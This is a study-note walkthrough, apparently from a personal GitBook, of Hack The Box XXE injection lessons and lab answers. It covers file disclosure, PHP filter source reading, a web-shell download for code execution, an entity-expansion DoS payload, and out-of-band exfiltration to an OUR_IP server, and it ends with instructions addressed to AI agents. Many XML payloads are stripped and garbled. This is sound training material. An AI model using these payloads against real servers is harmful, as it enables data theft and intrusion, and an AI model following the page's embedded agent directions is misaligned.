# XML External Entity (XXE) Injection | Key | Definition | Example | | ------------- | ------------------------------------------------------------------------------------------------------------- | ---------------------------------------- | | `Tag` | The keys of an XML document, usually wrapped with (`<`/`>`) characters. | `` | | `Entity` | XML variables, usually wrapped with (`&`/`;`) characters. | `<` | | `Element` | The root element or any of its child elements, and its value is stored in between a start-tag and an end-tag. | `01-01-2022` | | `Attribute` | Optional specifications for any element that are stored in the tags, which may be used by the XML parser. | `version="1.0"`/`encoding="UTF-8"` | | `Declaration` | Usually the first line of an XML document, and defines the XML version and encoding to use when parsing it. | `` | Furthermore, some characters are used as part of an XML document structure, like `<`, `>`, `&`, or `"`. So, if we need to use them in an XML document, we should replace them with their corresponding entity references (e.g. `<`, `>`, `&`, `"`). Finally, we can write comments in XML documents between ``, similar to HTML documents. ## Local File Disclosure ### Identifying The first step in identifying potential XXE vulnerabilities is finding web pages that accept an XML user input. We can start the exercise at the end of this section, which has a `Contact Form`:

If we fill the contact form and click on `Send Data`, then intercept the HTTP request with Burp, we get the following request:

As we can see, the form appears to be sending our data in an XML format to the web server, making this a potential XXE testing target. Suppose the web application uses outdated XML libraries, and it does not apply any filters or sanitization on our XML input. In that case, we may be able to exploit this XML form to read local files. If we send the form without any modification, we get the following message:

We see that the value of the `email` element is being displayed back to us on the page. To print the content of an external file to the page, we should `note which elements are being displayed, such that we know which elements to inject into`. In some cases, no elements may be displayed, which we will cover how to exploit in the upcoming sections. For now, we know that whatever value we place in the `` element gets displayed in the HTTP response. So, let us try to define a new entity and then use it as a variable in the `email` element to see whether it gets replaced with the value we defined. ```xml ]> ``` > Note: In our example, the XML input in the HTTP request had no DTD being declared within the XML data itself, or being referenced externally, so we added a new DTD before defining our entity. If the `DOCTYPE` was already declared in the XML request, we would just add the `ENTITY` element to it. Now, we should have a new XML entity called `company`, which we can reference with `&company;`. So, instead of using our email in the `email` element, let us try using `&company;`, and see whether it will be replaced with the value we defined (`Inlane Freight`):

As we can see, the response did use the value of the entity we defined (`Inlane Freight`) instead of displaying `&company;`, indicating that we may inject XML code. In contrast, a non-vulnerable web application would display (`&company;`) as a raw value. `This confirms that we are dealing with a web application vulnerable to XXE`. > Note: Some web applications may default to a JSON format in HTTP request, but may still accept other formats, including XML. So, even if a web app sends requests in a JSON format, we can try changing the `Content-Type` header to `application/xml`, and then convert the JSON data to XML with an [online tool](https://www.convertjson.com/json-to-xml.htm). If the web application does accept the request with XML data, then we may also test it against XXE vulnerabilities, which may reveal an unanticipated XXE vulnerability. ### Reading Sensitive Files Now that we can define new internal XML entities let's see if we can define external XML entities. Doing so is fairly similar to what we did earlier, but we'll just add the `SYSTEM` keyword and define the external reference path after it, as we have learned in the previous section: ```xml ]> ``` Let us now send the modified request and see whether the value of our external XML entity gets set to the file we reference:

We see that we did indeed get the content of the `/etc/passwd` file, `meaning that we have successfully exploited the XXE vulnerability to read local files`. This enables us to read the content of sensitive files, like configuration files that may contain passwords or other sensitive files like an `id_rsa` SSH key of a specific user, which may grant us access to the back-end server. We can refer to the [File Inclusion / Directory Traversal](https://academy.hackthebox.com/course/preview/file-inclusion) module to see what attacks can be carried out through local file disclosure. > Tip: In certain Java web applications, we may also be able to specify a directory instead of a file, and we will get a directory listing instead, which can be useful for locating sensitive files. ### Reading Source Code This would allow us to perform a `Whitebox Penetration Test` to unveil more vulnerabilities in the web application, or at the very least reveal secret configurations like database passwords or API keys. So, let us see if we can use the same attack to read the source code of the `index.php` file, as follows:

As we can see, this did not work, as we did not get any content. This happened because `the file we are referencing is not in a proper XML format, so it fails to be referenced as an external XML entity`. If a file contains some of XML's special characters (e.g. `<`/`>`/`&`), it would break the external entity reference and not be used for the reference. Luckily, PHP provides wrapper filters that allow us to base64 encode certain resources 'including files', in which case the final base64 output should not break the XML format. To do so, instead of using `file://` as our reference, we will use PHP's `php://filter/` wrapper. With this filter, we can specify the `convert.base64-encode` encoder as our filter, and then add an input resource (e.g. `resource=index.php`), as follows: ```xml ]> ``` With that, we can send our request, and we will get the base64 encoded string of the `index.php` file:

We can select the base64 string, click on Burp's Inspector tab (on the right pane), and it will show us the decoded file. For more on PHP filters, you can refer to the [File Inclusion / Directory Traversal](https://academy.hackthebox.com/module/details/23) module. `This trick only works with PHP web applications.` ### Remote Code Execution with XXE In addition to reading local files, we may be able to gain code execution over the remote server. The easiest method would be to look for `ssh` keys, or attempt to utilize a hash stealing trick in Windows-based web applications, by making a call to our server. If these do not work, we may still be able to execute commands on PHP-based web applications through the `PHP://expect` filter, though this requires the PHP `expect` module to be installed and enabled. If the XXE directly prints its output 'as shown in this section', then we can execute basic commands as `expect://id`, and the page should print the command output. The most efficient method to turn XXE into RCE is by fetching a web shell from our server and writing it to the web app, and then we can interact with it to execute commands ```shell-session eldeim@htb[/htb]$ echo '' > shell.php eldeim@htb[/htb]$ sudo python3 -m http.server 80 ``` Now, we can use the following XML code to execute a `curl` command that downloads our web shell into the remote server: ```xml ]> &company; ``` > Note: We replaced all spaces in the above XML code with `$IFS`, to avoid breaking the XML syntax. Furthermore, many other characters like `|`, `>`, and `{` may break the code, so we should avoid using them. Once we send the request, we should receive a request on our machine for the `shell.php` file, after which we can interact with the web shell on the remote server for code execution. > Note: The expect module is not enabled/installed by default on modern PHP servers, so this attack may not always work. This is why XXE is usually used to disclose sensitive local files and source code, which may reveal additional vulnerabilities or ways to gain code execution. ### Other XXE Attacks The [Server-Side Attacks](https://academy.hackthebox.com/course/preview/server-side-attacks) module thoroughly covers SSRF, and the same techniques can be carried with XXE attacks. Finally, one common use of XXE attacks is causing a Denial of Service (DOS) to the hosting web server, with the use the following payload: ```xml ]> &a10; ``` This payload defines the `a0` entity as `DOS`, references it in `a1` multiple times, references `a1` in `a2`, and so on until the back-end server's memory runs out due to the self-reference loops. However, `this attack no longer works with modern web servers (e.g., Apache), as they protect against entity self-reference`. Try it against this exercise, and see if it works. ### PoCs - Questions * Try to read the content of the 'connection.php' file, and submit the value of the 'api\_key' as the answer First, I intercept the peticion and see the body -->

I can see, it reflected me my email, so i wll be to identify el XXE ``` ]> ```

Nice! now I will try it give me the /connection.php file -->

## Advanced File Disclosure ### Advanced Exfiltration with CDATA To output data that does not conform to the XML format, we can wrap the content of the external file reference with a `CDATA` tag (e.g. ``). This way, the XML parser would consider this part raw data, which may contain any type of data, including any special characters. One easy way to tackle this issue would be to define a `begin` internal entity with ``, and then place our external entity file in between, and it should be considered as a `CDATA` element, as follows: ```xml "> ]> ``` After that, if we reference the `&joined;` entity, it should contain our escaped data. However, `this will not work, since XML prevents joining internal and external entities`, so we will have to find a better way to do so. To bypass this limitation, we can utilize `XML Parameter Entities`, a special type of entity that starts with a `%` character and can only be used within the DTD. What's unique about parameter entities is that if we reference them from an external source (e.g., our own server), then all of them would be considered as external and can be joined, as follows: ```xml ``` So, let's try to read the `submitDetails.php` file by first storing the above line in a DTD file (e.g. `xxe.dtd`), host it on our machine, and then reference it as an external entity on the target web application, as follows: ```shell-session eldeim@htb[/htb]$ echo '' > xxe.dtd eldeim@htb[/htb]$ python3 -m http.server 8000 Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ... ``` Now, we can reference our external entity (`xxe.dtd`) and then print the `&joined;` entity we defined above, which should contain the content of the `submitDetails.php` file, as follows: ```xml "> %xxe; ]> ... &joined; ``` Once we write our `xxe.dtd` file, host it on our machine, and then add the above lines to our HTTP request to the vulnerable web application, we can finally get the content of the `submitDetails.php` file:

> Note: In some modern web servers, we may not be able to read some files (like index.php), as the web server would be preventing a DOS attack caused by file/entity self-reference (i.e., XML entity reference loop), as mentioned in the previous section. This trick can become very handy when the basic XXE method does not work or when dealing with other web development frameworks. `Try to use this trick to read other files`. ### Error Based XXE First, let's try to send malformed XML data, and see if the web application displays any errors. To do so, we can delete any of the closing tags, change one of them, so it does not close (e.g. `` instead of ``), or just reference a non-existing entity, as follows:

To do so, we will use a similar technique to what we used earlier. First, we will host a DTD file that contains the following payload: ```xml "> ``` The above payload defines the `file` parameter entity and then joins it with an entity that does not exist. In our previous exercise, we were joining three strings. In this case, `%nonExistingEntity;` does not exist, so the web application would throw an error saying that this entity does not exist, along with our joined `%file;` as part of the error. There are many other variables that can cause an error, like a bad URI or having bad characters in the referenced file. Now, we can call our external DTD script, and then reference the `error` entity, as follows: ```xml %remote; %error; ]> ``` Once we host our DTD script as we did earlier and send the above payload as our XML data (no need to include any other XML data), we will get the content of the `/etc/hosts` file as follows:

This method may also be used to read the source code of files. All we have to do is change the file name in our DTD script to point to the file we want to read (e.g. `"file:///var/www/html/submitDetails.php"`). However, `this method is not as reliable as the previous method for reading source files`, as it may have length limitations, and certain special characters may still break it. ### PoCs - Questions * Use either method from this section to read the flag at '/flag.php'. (You may use the CDATA method at '/index.php', or the error-based method at '/error'). First I try with a basic CDATA but it did not work ... ``` "> %xxe; ]> ```

So i try an Error Based XXE, i will be to delete the heads root -->

NICE! it did not give us any error, so... create the "malware" -->

echo '<!ENTITY joined "%begin;%file;%end;">' > xxe.dtd
##
python3 -m http.server 8000

Then I modified the petition to refer to my hosted dtd: ```xml "> %xxe; ]> test 12345 &joined; test ``` > NOTE: we refer to `&joined` which is the name of the entity on our hosted dtd

So... It didnt work... i will try another error, i will modify the url /error/... -->

So now I’ll try to generate a dtd, host it and then call it from the petition: ```bash ## Create exploit.dtd "> ## then python3 -m http.server 8090 ``` > NOTE: save the previous xml into a `exploit.dtd`

```xml %remote; %error; ]> &remote; ```

## Blind Data Exfiltration For such cases, we can utilize a method known as `Out-of-band (OOB) Data Exfiltration`, which is often used in similar blind cases with many web attacks, like blind SQL injections, blind command injections, blind XSS, and of course, blind XXE. Both the [Cross-Site Scripting (XSS)](https://academy.hackthebox.com/course/preview/cross-site-scripting-xss) and the [Whitebox Pentesting 101: Command Injections](https://academy.hackthebox.com/course/preview/whitebox-pentesting-101-command-injection) modules discussed similar attacks, and here we will utilize a similar attack, with slight modifications to fit our XXE vulnerability. In our previous attacks, we utilized an `out-of-band` attack since we hosted the DTD file in our machine and made the web application connect to us (hence out-of-band) ### Out-of-band Data Exfiltration To do so, we can first use a parameter entity for the content of the file we are reading while utilizing PHP filter to base64 encode it. Then, we will create another external parameter entity and reference it to our IP, and place the `file` parameter value as part of the URL being requested over HTTP, as follows: ```xml "> ``` If, for example, the file we want to read had the content of `XXE_SAMPLE_DATA`, then the `file` parameter would hold its base64 encoded data (`WFhFX1NBTVBMRV9EQVRB`). When the XML tries to reference the external `oob` parameter from our machine, it will request `http://OUR_IP:8000/?content=WFhFX1NBTVBMRV9EQVRB`. Finally, we can decode the `WFhFX1NBTVBMRV9EQVRB` string to get the content of the file. We can even write a simple PHP script that automatically detects the encoded file content, decodes it, and outputs it to the terminal: ```php ``` So, we will first write the above PHP code to `index.php`, and then start a PHP server on port `8000`, as follows: ```shell-session eldeim@htb[/htb]$ vi index.php # here we write the above PHP code eldeim@htb[/htb]$ php -S 0.0.0.0:8000 ``` Now, to initiate our attack, we can use a similar payload to the one we used in the error-based attack, and simply add `&content;`, which is needed to reference our entity and have it send the request to our machine with the file content:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE email [ 
  <!ENTITY % remote SYSTEM "http://OUR_IP:8000/xxe.dtd">
  %remote;
  %oob;
]>
<root>&content;</root>

Then, we can send our request to the web application:

Finally, we can go back to our terminal, and we will see that we did indeed get the request and its decoded content: ```shell-session PHP 7.4.3 Development Server (http://0.0.0.0:8000) started 10.10.14.16:46256 Accepted 10.10.14.16:46256 [200]: (null) /xxe.dtd 10.10.14.16:46256 Closing 10.10.14.16:46258 Accepted root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin ...SNIP... ``` > Tip: In addition to storing our base64 encoded data as a parameter to our URL, we may utilize `DNS OOB Exfiltration` by placing the encoded data as a sub-domain for our URL (e.g. `ENCODEDTEXT.our.website.com`), and then use a tool like `tcpdump` to capture any incoming traffic and decode the sub-domain string to get the data. Granted, this method is more advanced and requires more effort to exfiltrate data through. ### Automated OOB Exfiltration Although in some instances we may have to use the manual method we learned above, in many other cases, we can automate the process of blind XXE data exfiltration with tools. One such tool is [XXEinjector](https://github.com/enjoiz/XXEinjector). This tool supports most of the tricks we learned in this module, including basic XXE, CDATA source exfiltration, error-based XXE, and blind OOB XXE. To use this tool for automated OOB exfiltration, we can first clone the tool to our machine, as follows: ```shell-session eldeim@htb[/htb]$ git clone https://github.com/enjoiz/XXEinjector.git Cloning into 'XXEinjector'... ...SNIP... ``` Once we have the tool, we can copy the HTTP request from Burp and write it to a file for the tool to use. We should not include the full XML data, only the first line, and write `XXEINJECT` after it as a position locator for the tool: ```http POST /blind/submitDetails.php HTTP/1.1 Host: 10.129.201.94 Content-Length: 169 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Content-Type: text/plain;charset=UTF-8 Accept: */* Origin: http://10.129.201.94 Referer: http://10.129.201.94/blind/ Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close XXEINJECT ``` Now, we can run the tool with the `--host`/`--httpport` flags being our IP and port, the `--file` flag being the file we wrote above, and the `--path` flag being the file we want to read. We will also select the `--oob=http` and `--phpfilter` flags to repeat the OOB attack we did above, as follows: ```shell-session eldeim@htb[/htb]$ ruby XXEinjector.rb --host=[tun0 IP] --httpport=8000 --file=/tmp/xxe.req --path=/etc/passwd --oob=http --phpfilter ...SNIP... [+] Sending request with malicious XML. [+] Responding with XML for: /etc/passwd [+] Retrieved data: ``` We see that the tool did not directly print the data. This is because we are base64 encoding the data, so it does not get printed. In any case, all exfiltrated files get stored in the `Logs` folder under the tool, and we can find our file there: ```shell-session eldeim@htb[/htb]$ cat Logs/10.129.201.94/etc/passwd.log root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin ...SNIP.. ``` Try to use the tool to repeat other XXE methods we learned. ### PoCs - Questions * Using Blind Data Exfiltration on the '/blind' page to read the content of '/327a6c4304ad5938eaf0efb6cc3e53dc.php' and get the flag. First, I captured the request and made one tho the `/blind` endpoint:

Then I tried to perform an OOB XXE. First I created a dtd where I put the content of the file I wanted to read and apply a filter to it: ``` "> ``` Then I saved it into `oob_xxe.dtd`. Afterwards I created a simple php script that automatically decodes any data I receive into the port `8000`: ``` ``` I saved it into `index.php`. Then I started a php server it with: ``` php -S 0.0.0.0:8000 ``` Now i modified the petition to call the external entity and forward the output to my php server: ``` %remote; %oob;]>&content; ```

--- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://eldeim.gitbook.io/brain_fuck/notes/certifications/eastereggs/htb-cbbh/web-attacks/xml-external-entity-xxe-injection.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.